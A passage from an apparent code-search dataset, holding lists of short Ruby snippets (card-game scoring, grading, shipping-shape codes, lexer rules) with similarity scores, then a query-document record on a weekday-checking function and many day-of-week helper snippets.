"def determine_shape_for(pc, ri)\n\t\tif pc == '1'\n\t\t\treturn '3' if ri == 'E3' or ri == 'E4' #Flat Rate Envelope\n\t\t\treturn '1' #Letters\n\t\telsif pc == '2'\n\t\t\treturn '3' if ri == 'E3' or ri == 'E4' or ri == 'FE' #Flat Rate Envelope\n\t\t\treturn 'I' if ri == 'E5' or ri == 'E6' or ri == 'E7' #Legal Flat Rate Envelope\n\t\t\treturn '9' if ri == 'FP' #Flat Rate Padded Envelope\n\t\t\treturn '2' #Flats\n\t\telsif pc == '3'\n\t\t\treturn 'J' if ri == 'C6'\n\t\t\treturn 'K' if ri == 'C7'\n\t\t\treturn 'L' if ri == 'C8'\n\t\t\treturn '8' if ri == 'E8' or ri == 'E9' or ri == 'EE' #Regular/Medium Flat Rate Box\n\t\t\treturn '5' #Parcels\n\t\telsif pc == '4'\n\t\t\treturn '5' #Parcels\n\t\telsif pc == '5'\n\t\t\treturn '9' if ri == 'FP' #Flat Rate Padded Envelope\n\t\t\treturn 'F' if ri == 'FS' #Small Flat Rate Box\n\t\t\treturn '8' if ri == 'FB' #Regular/Medium Flat Rate Box\n\t\t\treturn 'D' if ri == 'PL' #Large Flat Rate Box\n\t\t\treturn 'E' if ri == 'PM' #Large Flat Rate Military Box\n\t\t\treturn '5' #Parcels\n\t\telsif pc == 'O'\n\t\t\treturn '7' #PMOD/Pallets\n\t\telse\n\t\t\treturn '0' #Default/Fill\n\t\tend\n\tend",
"def get_grade int\n\tcase int\n\twhen 90...100\n\t\treturn \"A\"\n\twhen 80...89\n\t\treturn \"B\"\n\twhen 70...79\n\t\treturn \"C\"\n\twhen 60...69\n\t\treturn \"D\"\n\twhen 50...59\n\t\treturn \"F\"\n\telse \n\t\treturn \"F\"\n\tend\nend",
"def score\n score = 0\n aces_count = 0\n @hand_contents.each do |card|\n if card.type == :face\n score += 10\n elsif card.type == :ace\n aces_count += 1\n score += 11\n elsif card.type == :number\n score += card.rank.to_i\n end\n end\n\n while score > 21 && aces_count > 0\n score -= 10\n aces_count -= 1\n end\n score\n end",
"def get_energia_lipidos\n\t\t\t\t@lipidos * 9\n\t\t\tend",
"def handle_ace(hand,sum)\n\t\tputs \"inside handleace #{sum} and #{hand}\"\n\t\tif sum > 21 && hand.include?(21)\n\t\t\thand.each { |x| \n\t\t\t\tif x==\"A21\" \n\t\t\t\tx=\"A1\" \n\t\t\t\tend}\n\t\t\treturn hand\n\t\tend\n\tend",
"def which_hand(roll)\n case roll\n when 1..7 then result = \"Right\"\n when 8..9 then result = \"Left\"\n when 10 then result = \"Ambidextrous\"\n end\nend",
"def roman_numeral year\n thou = year/1000\n thou_remain = year%1000\n five_hundreds = thou_remain/500\n hundreds = (thou_remain%500)/100\n fifties = ((thou_remain%500)%100)/50\n tens = (((thou_remain%500)%100)%50)/10\n fives = ((((thou_remain%500)%100)%50)%10)/5\n ones = (((((thou_remain%500)%100)%50)%10)%5)/1\n \n \n #this is just to clear the terminal screen so you only see the result.\n100.times do puts \"\" \n end\n \n #outputs the letters times the number returned.\n puts \"M\" * thou + \"D\" * five_hundreds + \"C\" * hundreds + \"L\" * fifties + \"X\" * tens + \"V\" * fives + \"I\" * ones\nend",
"def preport\r\n\t\tputs \"#@name the #@type with #@health health has found an item and now has #@xp XP!\"\r\n\t\tputs \" \"\r\n\tend",
"def get_cr_or_level(num_of_pcs, cr_or_level)\n if num_of_pcs <= 4\n @cr = cr_or_level\n elsif num_of_pcs == 5\n @cr = cr_or_level + (cr_or_level * 0.25)\n elsif num_of_pcs == 6\n @cr = cr_or_level + (cr_or_level * 0.5)\n elsif num_of_pcs == 7\n @cr = cr_or_level + (cr_or_level * 0.75)\n elsif num_of_pcs == 8\n @cr = cr_or_level + cr_or_level\n end\n end",
"def scoreScissors m\n\t\t[1,0]\n\tend",
"def scoreRock m\n\t\t[0,0]\n\tend",
"def raindrops(number)\n output = \"\"\n if number % 3 != 0 && number % 5 !=0 && number % 7 != 0\n output = number\n end\n if number % 3 == 0\n output += 'Pling'\n end\n if number % 5 == 0\n output += 'Plang'\n end\n if number % 7 == 0\n output += 'Plong'\n end\n puts output\nend",
"def virality\n 0\n end",
"def base\n nombre = @nombre\n b = 1# nombre de diese\n nombre.times do |i|\n if i == 0\n next\n end\n espace = \" \"\n has = \"# \"\n \n c = nombre - i# nombre d'espace\n a = nombre - c\n puts \" #{espace*=c} #{has=has*b}\"\n b = (i + 2 + a)-1# nombre de diese\n end\n\nend",
"def pos_to_slot()\n {1 => 19, 2 => 25, 3 => 31, 4 => 87, 5 => 93, 6 => 99, 7 => 155, 8 => 161, 9 => 167}\nend",
"def calculate_score(hand_of_cards)\n card_values = hand_of_cards.map{|card_value| card_value[1]}\n total = 0 \n card_values.each do |card_value| \n if card_value == \"ACE\"\n total+= 11\n elsif card_value.to_i == 0 #For suits ie Jester, Queen\n total+= 10\n else \n total+= card_value.to_i\n end\n end \n\n#adjust for Aces\n card_values.select{|card| card == \"ACE\"}.count.times do \n total-=10 if total > 21\n end \n total\nend",
"def score\n if strike?\n pins + next_two_rolls rescue nil\n elsif spare?\n pins + next_roll rescue nil\n else\n pins\n end\n end",
"def weight\n 2 # ounces\n end",
"def digit!\n # -> uncomment the next line to manually enable rule tracing\n # trace_in( __method__, 46 )\n\n \n # - - - - main rule block - - - -\n # at line 392:10: '0' .. '9'\n match_range( 0x30, 0x39 )\n\n ensure\n # -> uncomment the next line to manually enable rule tracing\n # trace_out( __method__, 46 )\n\n end",
"def comp_choose_rps\n\trand_num = rand(3) \n\tif rand_num == 1 \n\t \"rock\"\n\telsif rand_num == 2 \n\t \"paper\"\n\telse \n\t \"scissors\"\n\tend\nend",
"def bicipital\n\t\t(@bicipital[0] + @bicipital[1] + @bicipital[2])/3\n\tend",
"def forty_two\n self[41]\n end",
"def tiredness (hours)\n if hours == 'ok'\n @rested += 1\n elsif hours == 'bad'\n @rested -= 1\n elsif hours == 'shit'\n @rested -= 5\n elsif hours == 'amazing'\n @rested += 5\n end\n end",
"def CP(level)\r\n cpNeeded = 0\r\n if level > 0 && level <= 5\r\n cpNeeded + 4\r\n elsif level > 5 && level <= 20\r\n cpNeeded + 8\r\n else\r\n cpNeeded + 0\r\n end\r\nend",
"def scorePaper m\n\t\t[0,0]\n\tend",
"def getNbRecompense\n return 0\n end",
"def determine_hand_value(hand)\n value_hand = hand.map do |x|\n if x.include?(\"Ace\")\n x = 11\n elsif [\"K\", \"Q\", \"J\", \"1\"].include?(x[0])\n x = 10\n else\n x = x[0].to_i\n end\n end\n value_hand = value_hand.inject(0) { |result, element| result + element }\n adjust_value_for_aces(hand, value_hand)\nend",
"def australian_postcodes_po_boxes\n nsw = (1000..1999).to_a\n act = (200..299).to_a\n vic = (8000..8999).to_a\n qld = (9000..9999).to_a\n sa = (5800..5999).to_a\n wa = (6800..6999).to_a\n tas = (7800..7999).to_a\n nt = (900..999).to_a\n \n # Convert integers to strings (postcodes are *not* integers)\n (nsw + act + vic + qld + sa + wa + tas + nt).map { |p| \"%04i\" % p }\nend",
"def convert_rt_priority_to_freshdesk (rt_priority)\n return 1 if rt_priority.to_i == 4\n return 2 if rt_priority.to_i == 3\n return 3 if rt_priority.to_i == 2\n return 4 if rt_priority.to_i == 1\nend",
"def print_case\n puts \" 1 2 3\" \n for n in 0..2 do #on commence à compter à 0\n print (65+n).chr + \" \" #affiche 65.chr correspond à A en ACSII donc ensuite en ajoutant n, on a B, C, \n @case_array[n][0].print_case\n print \" | \"\n @case_array[n][1].print_case\n print \" | \"\n @case_array[n][2].print_case \n puts\n end \n end",
"def name\n case @value\n when 0\n 'Joker'\n when 11\n \"Jack of #{@suit}\"\n when 12\n \"Queen of #{@suit}\"\n when 13\n \"King of #{@suit}\"\n when 14\n \"Ace of #{@suit}\"\n else\n \"#{@value.to_s} of #{@suit}\"\n\n end\n end",
"def kcalproteinas\n\t\t\t@proteinas * 4\n\t\tend",
"def value(hand)\n ace_count = 0\n hand_value = 0\n\n hand.each do |card|\n if card == :ace\n ace_count += 1\n hand_value += 11\n else\n hand_value += card\n end\n end\n\n # flip aces from being worth 11 to being worth 1 until we get <= 21\n # or we run out of aces\n while hand_value > 21 && ace_count > 0\n hand_value -= 10\n ace_count -= 1\n end\n\n hand_value\nend",
"def score\n return 'love' if love?\n return \"fifteen\" if fifteen?\n return \"thirty\" if thirty?\n return \"forty\" if forty?\n return \"deuce\" if deuce?\n return \"advantage\" if advantage?\n return \"win\" if win?\n end",
"def non_zero_digit; end",
"def huella_carbono\n if geidiario() < 800\n return 1\n end\n if geidiario() > 1200\n return 3\n else\n return 2\n end\n end",
"def criminal_skills(roll)\n case roll\n when 1..2\n if @@skills.include? \"Barter\"\n @@criminal_skill_rolls += 1\n else\n @@skills << \"Barter\" # 1 pt max\n end\n when 3..9\n @@skills << \"Climbing\"\n when 10..13\n @@skills << \"Disguise Artist\"\n when 14..19\n @@skills << \"Dodge\"\n when 20..21\n @@skills << \"Driver\"\n when 22\n if @@skills.include? \"Erotic Arts\"\n @@criminal_skill_rolls += 1\n else\n @@skills << \"Erotic Arts\" # max 1 skill pt in this area\n end\n when 23..25\n if @@skills.include? \"Forgery\"\n @@criminal_skill_rolls += 1\n else\n @@skills << \"Forgery\"\n @@literacy = \"Literate\"\n end\n when 26..29\n @@skills << \"Gambler\"\n when 30..31\n @@skills << \"Grapple\"\n when 32\n @@skills << \"Gun Slinger\"\n when 33\n @@skills << \"Gunsmith\"\n when 34..37\n @@skills << \"Junk Crafter\"\n when 38..41\n @@skills << \"Knife Fighter\"\n when 42..47\n @@skills << \"Knife Thrower\"\n when 48..51\n @@skills << \"Lying\"\n when 52\n @@skills << \"Medic\"\n when 53..54\n if @@skills.include? \"Navigate by Stars\"\n @@criminal_skill_rolls += 1\n else\n @@skills << \"Navigate by Stars\" # max 1 point in this skill\n end\n when 55\n @@skills << \"Negotiating\"\n when 56..66\n @@skills << \"Pick Locks\"\n when 67..77\n @@skills << \"Pick Pocket\"\n when 78\n @@skills << \"Pilot\"\n when 79\n @@skills << \"Relic Knowledge\"\n when 80..81\n @@skills << \"Riding\"\n when 82\n @@skills << \"Sniper\"\n when 83..88\n @@skills << \"Stealth\"\n when 89..91\n @@skills << \"Tracking\"\n when 92..94\n @@skills << \"Unarmed Combat\"\n when 95\n @@skills << \"Wilderness Survival\"\n when 96..100\n @@skills << \"Weapons Expert\"\n # if rolled more than once, take a second level in the same weapon or randomly roll a new weapon -- player's choice. Mutants and cyborgs can choose to apply the weapon expert skill to a mutation or implant, as desired.\n end\nend",
"def printCard(card_number)\n \n # get card rank\n rank = case card_number % 13\n when 0 then :King\n when 1 then :Ace\n when 11 then :Jack\n when 12 then :Queen\n else card_number % 13 \n end\n \n # get suit\n suit = case (card_number) % 4\n when 0 then :Heart\n when 1 then :Diamond\n when 2 then :Spade\n else :Club\n end\n\n return \"#{rank} of #{suit}\"\n \nend",
"def how_many_light_sabers_do_you_own(name = \"\")\n name == \"Zach\" ? 18 : 0\nend",
"def get_grade(n)\n puts n\n case n\n when 90..100\n p \"A\"\n when 80..89\n p \"B\"\n when 70..79\n p \"C\"\n when 60..69\n p \"D\"\n when 00..59\n p \"F\"\n else\n puts \"Please enter a number.\"\n end\n\nend",
"def assess_situation(number, announcement, excuse)\n if number == 99\n puts \"#{excuse}\"\n elsif number == 21\n puts \"#{announcement}\"\n else number == 3\n puts \"Meh. Hard Pass\"\n end\nend",
"def get_numerology (your_number)\r\n\tcase your_number\r\n\t\twhen 1\r\n\t\t\tputs \"You are a ONE! One is the leader. The number one indicates the ability to stand alone, and is a strong vibration. Ruled by the Sun.\"\r\n\t\twhen 2\r\n\t\t\tputs \"You are a TWO! This is the mediator and peace-lover. The number two indicates the desire for harmony. It is a gentle, considerate, and sensitive vibration. Ruled by the Moon.\"\r\n\t\twhen 3\r\n\t\t\tputs \"You are a THREE! Number Three is a sociable, friendly, and outgoing vibration. Kind, positive, and optimistic, Three’s enjoy life and have a good sense of humor. Ruled by Jupiter.\"\r\n\t\twhen 4\r\n\t\t\tputs \"You are a FOUR! This is the worker. Practical, with a love of detail, Fours are trustworthy, hard-working, and helpful. Ruled by Uranus.\"\r\n\t\twhen 5\r\n\t\t\tputs \"You are a FIVE! This is the freedom lover. The number five is an intellectual vibration. These are ‘idea’ people with a love of variety and the ability to adapt to most situations. Ruled by Mercury.\"\r\n\t\twhen 6 \r\n\t\t\tputs \"You are a SIX! This is the peace lover. The number six is a loving, stable, and harmonious vibration. Ruled by Venus.\"\r\n\t\twhen 7 \r\n\t\t\tputs \"You are a SEVEN! This is the deep thinker. The number seven is a spiritual vibration. These people are not very attached to material things, are introspective, and generally quiet. Ruled by Neptune.\"\r\n\t\twhen 8 \r\n\t\t\tputs \"You are an EIGHT! This is the manager. Number Eight is a strong, successful, and material vibration. Ruled by Saturn.\"\r\n\t\twhen 9\r\n\t\t\tputs \"You are a NINE! This is the teacher. Number Nine is a tolerant, somewhat impractical, and sympathetic vibration. Ruled by Mars.\"\r\n\t\telse \r\n\t\t\tputs \"Sorry, but your number doesn't exist.\"\r\n\tend\r\nend",
"def print_changing_numbers\n\t\ti = 1\n\t\t#zolang i kleiner is dan 11\n\t\twhile i < 11\n\t\t\t#print de string met het nummer variabele en verhoog het daarna met 1\n\t\t\tputs \"This sentence is number #{i}\"\n\t\t\ti = i+1\n\t\tend\n\tend",
"def cuantos_pares\n @pares = []\n @pares = @valores.to_h.select{|k, v| (2..2).cover?(v)}\n @pares.size\n end",
"def digit!\n # -> uncomment the next line to manually enable rule tracing\n # trace_in( __method__, 37 )\n\n type = DIGIT\n channel = ANTLR3::DEFAULT_CHANNEL\n\n \n # - - - - main rule block - - - -\n # at line 136:8: '0' .. '9'\n match_range( 0x30, 0x39 )\n\n \n @state.type = type\n @state.channel = channel\n\n ensure\n # -> uncomment the next line to manually enable rule tracing\n # trace_out( __method__, 37 )\n\n end",
"def roman_numeral number\n\nend",
"def digit!\n # -> uncomment the next line to manually enable rule tracing\n # trace_in( __method__, 53 )\n\n type = DIGIT\n channel = ANTLR3::DEFAULT_CHANNEL\n\n \n # - - - - main rule block - - - -\n # at line 352:8: '0' .. '9'\n match_range( 0x30, 0x39 )\n\n \n @state.type = type\n @state.channel = channel\n\n ensure\n # -> uncomment the next line to manually enable rule tracing\n # trace_out( __method__, 53 )\n\n end",
"def score\n result = 0\n tiro_index = 0\n rellenar_vector\n\n 10.times do\n if strike?(tiro_index)\n result += strike_Score(tiro_index)\n tiro_index += 1\n elsif spare?(tiro_index)\n\n result += spare_score(tiro_index)\n tiro_index += 2\n else\n result += cuadro_score(tiro_index)\n tiro_index += 2\n end\n end\n result\n end",
"def preferences\n [\n {fish: 15, leisure: 1},\n {fish: 15, leisure: 0},\n {fish: 14, leisure: 0},\n {fish: 13, leisure: 0},\n {fish: 12, leisure: 0},\n {fish: 11, leisure: 0},\n {fish: 10, leisure: 0},\n {fish: 9, leisure: 0},\n {fish: 8, leisure: 0},\n {fish: 7, leisure: 0},\n {fish: 6, leisure: 0},\n {fish: 5, leisure: 0},\n {fish: 4, leisure: 0},\n {fish: 3, leisure: 0},\n {fish: 2, leisure: 0},\n {fish: 1, leisure: 0},\n {fish: 0, leisure: 0}\n ]\n end",
"def ayarla(toplam)\n if toplam > 0\n return 1\n else\n return 0\n end\n end",
"def - rival\n case rival\n when Paper\n puts 'Paper tie (loser Paper)'\n when Scissors\n puts 'Scissors cut Paper (loser Paper)'\n when Lizard\n puts 'Lizard eats Paper (loser Paper)'\n else\n return rival - self\n end\n Paper\n end"
] | [
"0.61682594",
"0.5817779",
"0.5750655",
"0.56960154",
"0.5677398",
"0.5660142",
"0.56399095",
"0.5547494",
"0.5535588",
"0.5528255",
"0.5483012",
"0.54519147",
"0.5434948",
"0.54230285",
"0.541586",
"0.5403975",
"0.53857213",
"0.5367293",
"0.5358745",
"0.53388107",
"0.53162485",
"0.5312163",
"0.53116137",
"0.5307852",
"0.530172",
"0.5299927",
"0.5292735",
"0.52912796",
"0.52880275",
"0.5284393",
"0.52770674",
"0.52688825",
"0.52606964",
"0.52606964",
"0.5248154",
"0.5236471",
"0.5215105",
"0.5211385",
"0.5211154",
"0.52055776",
"0.5202333",
"0.52005565",
"0.51977277",
"0.5194523",
"0.51838505",
"0.5181531",
"0.5180617",
"0.5179706",
"0.517797",
"0.5174341",
"0.5173554",
"0.51732105",
"0.5170943",
"0.51664937",
"0.51612085",
"0.51576674",
"0.5157412",
"0.51526326",
"0.51481813",
"0.51473916",
"0.51444376",
"0.5142608",
"0.5142127",
"0.5136651",
"0.5128358",
"0.5119313",
"0.5116132",
"0.5113206",
"0.5112608",
"0.5111912",
"0.5111329",
"0.5106036",
"0.5102099",
"0.51016647",
"0.5100237",
"0.50976485",
"0.50923514",
"0.5091495",
"0.5090733",
"0.50890297",
"0.50867426",
"0.5084875",
"0.50846595",
"0.5083726",
"0.50794303",
"0.50786716",
"0.5077489",
"0.5075183",
"0.507076",
"0.5070744",
"0.5059963",
"0.5056383",
"0.5055364",
"0.5051853",
"0.504906",
"0.50470483",
"0.50453335",
"0.5044858",
"0.50443035",
"0.5036427",
"0.503423"
] | 0.0 | -1 |
=============================================================================== Days of the week =============================================================================== | def pbIsWeekday(wdayVariable,*arg)
timenow = pbGetTimeNow
wday = timenow.wday
ret = false
for wd in arg
ret = true if wd==wday
end
if wdayVariable>0
$game_variables[wdayVariable] = [
_INTL("Sunday"),
_INTL("Monday"),
_INTL("Tuesday"),
_INTL("Wednesday"),
_INTL("Thursday"),
_INTL("Friday"),
_INTL("Saturday")][wday]
$game_map.need_refresh = true if $game_map
end
return ret
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def day_of_week\n dnum = day\n dnum -= 10 if dnum > 20\n dnum -= 10 if dnum > 10\n dnum -= 1\n dnum\n end",
"def day_of_week(date)\n 7 - date.cwday\n end",
"def dayOfWeek\n days = 0;\n tempYear = MIN_YEAR\n while tempYear < @year\n days += SimpleDate.daysInYear(tempYear).to_i\n tempYear+=1\n end\n\n days = days + ordinalDate\n #puts \"days #{days}\"\n days = days % 7\n\n end",
"def week\n first_day_of_week = @date.monday\n \n days_of_week = []\n 7.times do |time|\n days_of_week << day_and_types(first_day_of_week + time.days)\n end \n \n days_of_week\n end",
"def weeks() 7 * days end",
"def week_days\n {\n \"1\" => 'mon',\n \"2\" => 'tue',\n \"3\" => 'wed',\n \"4\" => 'thu',\n \"5\" => 'fri',\n \"6\" => 'sat',\n \"7\" => 'sun'\n }\n end",
"def day_of_week\n # Zellers: 0 = Saturday, 1 = Sunday, 2 = Monday, ..., 6 = Friday\n # day_of_week: 1 = Sunday, 7 = Saturday\n (zellers_congruence + 6) % 7\n end",
"def days\n monday..sunday\n end",
"def day_of_week\n # Date.wday returns 0-6 for Sunday,...Saturday\n return @day.wday\n end",
"def calendar_wdays(starting_day = 0)\n start_week = Date.today.beginning_of_week + (starting_day - 1).days # In rails week start in monday and monday.wday is 1\n (start_week...start_week+7.days).collect { |day| I18n.l(day, :format => '%A') }\n end",
"def day_of_week\n return -1 if self.day_of_year == 308\n result = self.days_since_epoch % 8\n if result > 0\n result\n else\n 8\n end\n\n end",
"def day_in_week_int \n\t\tdays = []\n\t\ttoday = Time.now\n\t\tdays.push(today.to_i)\n\t\ttoday_week_day = today.wday\n\t\tanothers = (0..6).select {|e| e != today_week_day}\n\t\tanothers.map do |e|\n\t\t\tdays.push(today.to_i - e*day_second)\n\t\tend\n\n\t\tdays.sort\n\tend",
"def days_in_week(*days)\n @test_time = @time if @test_time.nil?\n x_in_list_of_y(@test_time.wday, Configuration.parse_range(days,0...7).flatten)\n end",
"def days_past_in_week\n to_date.cwday\n end",
"def set_days_of_week\n @days_of_week = Date::DAYNAMES.each_with_index\n end",
"def start_of_week; self - wday.days end",
"def day_in_week(args = nil)\n if args\n args.each do |key, val|\n case key\n when :mfirst\n else\n raise ArgumentError, \"Invalid key in arguments: '#{key}'.\"\n end\n end\n end\n \n #This is a monday - 0. Use this date to calculate up against.\n def_date = Datet.new(1970, 1, 4)\n \n if self > def_date\n days = Datet.days_between(def_date, self)\n factor = days.to_f / 7.0\n diw = days - (factor.floor * 7)\n else\n days = Datet.days_between(self, def_date)\n factor = days.to_f / 7.0\n diw = days - (factor.floor * 7)\n diw = 7 - diw\n diw = 0 if diw == 7\n end\n \n #Monday should be the first day in the week.\n if args and args[:mfirst]\n if diw == 0\n diw = 6\n else\n diw -= 1\n end\n end\n \n return diw\n end",
"def end_of_week; self + (6 - wday).days end",
"def working_days_from_date(date)\r\n date = date + 1.day if date.cwday == 6\r\n day_of_the_week = date.cwday == 7 ? 0 : date.cwday\r\n calendar_days, business_days = self, self\r\n result_date = day_of_the_week + business_days\r\n if (result_date >= 6)\r\n business_days -= (6 - day_of_the_week)\r\n calendar_days += 2\r\n weeks = business_days / 5\r\n calendar_days += (weeks * 2)\r\n end\r\n date + calendar_days.days\r\n end",
"def wday() end",
"def days_left_in_week\n 7 - days_past_in_week\n end",
"def _week_day_numbers\n week_day_start = self.week_day_start\n week_day_start.capitalize if week_day_start.is_a? String\n [0, 1, 2, 3, 4, 5, 6].partition {|on| on >= day_names.index(week_day_start)%7 }.flatten\n end",
"def day_of_week\n to_time.wday\n end",
"def weekdays\n wdays = []\n wdays << 0 if sun\n wdays << 1 if mon\n wdays << 2 if tue\n wdays << 3 if wed\n wdays << 4 if thu\n wdays << 5 if fri\n wdays << 6 if sat\n\n wdays\n end",
"def days() 24 * hours end",
"def nth_wday_day(w,d)\n 1 + (d - (wday - day + 1)) % 7 + w * 7\n end",
"def w_day; end",
"def nwday_day(n)\n w = n % 7\n 1 + (w - (wday - day + 1)) % 7 + n - w\n end",
"def day_of_week\n\tif @current_time.wday == 0 || @current_time.wday == 6\n\t\tweek_period = \"Weekends\"\n\telse\n\t\tweek_period = \"Weekdays\"\n\tend\nend",
"def week; end",
"def wednesday\n day(:wednesday)\n end",
"def days\n self.to_i * 86_400\n end",
"def each_days_of_week(*wdays)\n if wdays.empty?\n each_days\n else\n each_days.except {|dt| !wdays.include?(dt.wday) }\n end\n end",
"def nth_wday; (day - 1) / 7 end",
"def wday\n components.weekday - 1\n end",
"def week\n working_date = DateTime.new(self.year, 1, 1)\n working_date.week_day_start = self.week_day_start\n working_date = (working_date-working_date.send(\"wday_offset\"))\n week_num = 0\n working_date.step(self) { |a_day| \n if a_day.wday == _week_day_numbers.first\n week_num += 1\n end\n }\n week_num\n end",
"def weeks ; self * 7.days ; end",
"def day_of_week(date)\n date.cwday # cwday returns the day of calendar week (1-7, Monday is 1).\nend",
"def get_start_of_week(d)\n d -= DAY until d.monday?\n d\n end",
"def week(date = Date.today)\n day = monday(date)\n (day..day + 6)\n end",
"def wday() @m_date.wday end",
"def days\n self * SECONDS_IN_DAY\n end",
"def getDayOnWeek(weekStart, dayVal)\n\t\tweekDay = ((7 + (dayVal - weekStart.wday)) % 7)\n\t\tdayDateVal = weekStart + weekDay.days\n\t\tdayDateVal\n\tend",
"def day_of_the_week(day)\n @dias = {1 => \"LUNES\", 2 => \"MARTES\", 3 => \"MIERCOLES\", 4 => \"JUEVES\", 5 => \"VIERNES\", 6 => \"SÁBADO\", 7 => \"DOMINGO\"}\n return @dias[day]\n end",
"def getSundays(d1,d2)\n d1 += 1 while (d1.wday != 0) # add days till starting on sunday\n sundays = []\n d1.step(d2,7) do |date| # move forward seven days for every sunday\n sundays .push date\n end\n sundays\nend",
"def day_of_week\n start_on.strftime(WEEKDAY_NAME)\n end",
"def wday\n return self.to_a[IDX_WDAY]\n end",
"def week_days(options={}, &block)\n start_date = self\n result = []\n (start_date-wday_offset).step 7 do |a_day|\n a_day.week_day_start = self.week_day_start\n if block_given?\n yield a_day\n else\n result.push(a_day)\n end\n end\n result\n end",
"def day_in_week_str\n\t\tdays = []\n\t\ttoday = Time.now\n\t\tdays.push(formatted(today))\n\t\ttoday_week_day = today.wday\n\t\tanothers = (0..6).select {|e| e != today_week_day}\n\t\tanothers.map do |e|\n\t\t\tdays.push(formatted(Time.at(today.to_i - e*day_second)))\n\t\tend\n\n\t\tdays.sort\n\tend",
"def days_of_week\n\n # create an array for processing\n days_array = [sunday, monday, tuesday, wednesday, thursday, friday, saturday]\n int_array = Array.new\n for day in days_array\n day ? int_array.push(1) : int_array.push(0)\n end\n\n # process with little recursive function\n r(int_array, 0)\n # fix first value, see note below\n int_array[0] == -1 ? int_array[0] = 1 : nil\n\n # final passes, change values into useable string\n int_array[0] == 1 ? int_array[0] = 'Su' : nil\n int_array[1] == 1 ? int_array[1] = 'M' : nil\n int_array[2] == 1 ? int_array[2] = 'Tu' : nil\n int_array[3] == 1 ? int_array[3] = 'W' : nil\n int_array[4] == 1 ? int_array[4] = 'Th' : nil\n int_array[5] == 1 ? int_array[5] = 'F' : nil\n int_array[6] == 1 ? int_array[6] = 'Sa' : nil\n\n int_array.delete(0)\n int_array.map{ |x| x == -1 ? '-' : x}.uniq.join\n\n end",
"def days_of_week_string\n dow = days_of_week_hash\n\n @days_of_week_string ||=\n (dow[:sunday] ? \"Su\" : \"\") +\n (dow[:monday] ? \"M\" : \"\") +\n (dow[:tuesday] ? \"Tu\" : \"\") +\n (dow[:wednesday] ? \"W\" : \"\") +\n (dow[:thursday] ? \"Th\" : \"\") +\n (dow[:friday] ? \"F\" : \"\") +\n (dow[:saturday] ? \"Sa\" : \"\")\n end",
"def date_end # originally date_start\n\tdate = Date.today\n\t(1..7).each do |n|\n\t\tdate = Date.today - n#.days\n\t\tbreak if date.wday == 6 # 0 = Sun, 1 = Mon ... 6 = Sat\n\tend\n\tdate\nend",
"def wday\n @date_time_value.wday\n end",
"def days ; self * 24.hours ; end",
"def weekday(days)\nt = Date.today\narr = []\n days.times do\n arr << \"ok\" if t.saturday? || t.sunday?; t = t - 1\n end\n arr.count\nend",
"def days_of_week_hash\n @days_of_week_hash ||= {\n :sunday => (days_of_week & SUNDAY ) > 0,\n :monday => (days_of_week & MONDAY ) > 0,\n :tuesday => (days_of_week & TUESDAY ) > 0,\n :wednesday => (days_of_week & WEDNESDAY ) > 0,\n :thursday => (days_of_week & THURSDAY ) > 0,\n :friday => (days_of_week & FRIDAY ) > 0,\n :saturday => (days_of_week & SATURDAY ) > 0\n }\n end",
"def days_of_week_between(day_of_week, start_date, end_date)\n ((start_date..end_date).select{ |d| d.wday == day_of_week }).count\n end",
"def day_of_week\n Date::DAYNAMES.fetch(recurring_event.day).downcase.to_sym\n end",
"def mweek; (5 - wday + day) / 7 end",
"def day_name; Date::DAYNAMES[wday] end",
"def each_wednesday(n=1, offset=0, dur=1); each_wdays(self.Wed,n,offset,dur); end",
"def day_of_week(*weekdays)\n merge(day: weekdays)\n end",
"def test_start_of_week(p_date)\n if p_date.wday == 0 #sundays count as end of week for vehicle app\n return p_date - 6\n else\n (p_date - p_date.wday.days) + 1 #start on monday\n end\n end",
"def days_of_week_array\n dow = days_of_week_hash\n\n @days_of_week_array ||= [\n dow[:sunday],\n dow[:monday],\n dow[:tuesday],\n dow[:wednesday],\n dow[:thursday],\n dow[:friday],\n dow[:saturday]\n ]\n end",
"def days_to_week_start(start_day = Date.beginning_of_week)\n start_day_number = DAYS_INTO_WEEK.fetch(start_day)\n (wday - start_day_number) % 7\n end",
"def days(n)\n n * 3600 * 24\nend",
"def day_of_the_week(time)\n Date::DAYNAMES[time.wday]\nend",
"def day_to_wdiw( day )\n\t\tk = offset( first_day.cwday )\n\t\td = day + k - 1\n\t\tw = d / DPW\n\t\tdiw = d % DPW\n\n\t\t[ w, diw ]\n end",
"def get_days\n return 0b0 if @params[:type] != 'advanced'\n\n return get_weekday_bitmask(['weekday_sun', 'weekday_mon', 'weekday_tue', 'weekday_wed', 'weekday_thu', 'weekday_fri', 'weekday_sat']) if @params[:schedule] == 'weekly'\n\n return get_month_bitmask(@params[:dates_picked]) if @params[:schedule] == 'monthly' && @params[:days] == 'specific'\n\n return get_unspecific_days\n\n end",
"def sunday_after days_ago=0\n d = Date.today - days_ago\n until d.sunday?\n d += 1\n end\n d\nend",
"def d_days( v )\n TimeDelta.new( DAY_TO_MS * v )\n end",
"def to_weekday_if_weekend(date)\n date += 1 if date.wday == 0\n date -= 1 if date.wday == 6\n date\n end",
"def day_of_week(weekdays, *extras)\n merge(day: weekdays.array_concat(extras))\n end",
"def cwday() \n _wday = @m_date.wday\n return 7 if _wday == 0\n \n return _wday\n end",
"def week_index\n @week_index ||= date.wday\n end",
"def wday_difference(from, to, direction)\n return direction * ((direction * (to - from)) % 7)\n end",
"def weekdays\n value.each_char.map { |c| WEEKDAYS.index(c) }\n end",
"def handle_dn\n @wday = Date::DAYS[@tokens[@index].get_tag(DayName).type]\n @index += 1\n @precision = :day\n end",
"def day_of_week(year, month, day)\n d = day\n m = (month - 3) % 12 + 1\n yy = month < 3 ? year-1 : year\n y = yy % 100\n c = yy / 100\n (d + (2.6 * m - 0.2).floor + y + (y/4.0).floor + (c/4.0).floor - 2*c) % 7\nend",
"def odd_week?; (to_i / 7.days).odd? end",
"def weeks\n\t\treturn self * 7.days\n\tend",
"def weeks\n\t\treturn self * 7.days\n\tend",
"def getDayOffCount\n\t\tdayCount = 0\n\t\tunless Setting.plugin_redmine_wktime['wk_schedule_weekend'].blank?\n\t\t\tdayCount = Setting.plugin_redmine_wktime['wk_schedule_weekend'].length\n\t\tend\n\t\tdayCount\n\tend",
"def wday\n to_g.wday\n end",
"def days; self * DAY; end",
"def days; self * DAY; end",
"def weekdays\n lines[1]\n end",
"def first_wday; (wday - day + 1) % 7 end",
